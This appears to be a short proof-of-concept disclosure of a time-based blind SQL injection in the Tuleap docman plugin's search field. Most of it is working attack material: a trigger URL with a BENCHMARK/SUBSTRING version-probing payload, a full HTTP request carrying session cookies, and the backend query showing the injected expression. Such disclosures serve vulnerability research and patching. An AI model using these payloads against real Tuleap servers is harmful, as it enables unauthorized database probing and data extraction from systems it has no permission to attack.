SQL Trigger URL:

<code>

https://[IP]/plugins/docman/?group_id=100&id=16&action=search&global_txt=ad'%2bIF(SUBSTRING(@@version,1,1)=5,BENCHMARK(20000000,MD5(1)),null)%2b'&global_filtersubmit=Apply

</code>

SQL Full Request:

<code>

GET

/plugins/docman/?group_id=100&id=16&action=search&global_txt=ad'%2bbenchmark(20000000%2csha1(1))%2b'&global_filtersubmit=Apply

HTTP/1.1

Host: [IP]

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101

Firefox/31.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://192.168.56.108/plugins/docman/?group_id=100

Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6;

TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96

Connection: keep-alive

</code>

SQL PoC generated query:

<code>

SELECT i.*,  v.id as version_id, v.number as version_number, v.user_id as version_user_id, v.label as version_label, v.changelog as version_changelog, v.date as version_date, v.filename as version_filename, v.filesize as version_filesize, v.filetype as version_filetype, v.path as version_path,  1 as folder_nb_of_children FROM plugin_docman_item AS i LEFT JOIN plugin_docman_version AS v  ON (i.item_id = v.item_id) LEFT JOIN plugin_docman_version AS v2  ON (v2.item_id = v.item_id AND v.number < v2.number)  WHERE 1 AND i.delete_date IS NULL AND (i.obsolescence_date = 0 OR i.obsolescence_date > 1409011201) AND  v2.id IS NULL AND  i.group_id =

100 AND (MATCH (i.title, i.description) AGAINST ('ad'+benchmark(20000000,md5(1))+'' IN BOOLEAN MODE) OR MATCH (v.label, v.changelog, v.filename) AGAINST ('ad'+benchmark(20000000,md5(1))+'' IN BOOLEAN MODE)) ORDER BY i.update_date DESC; </code>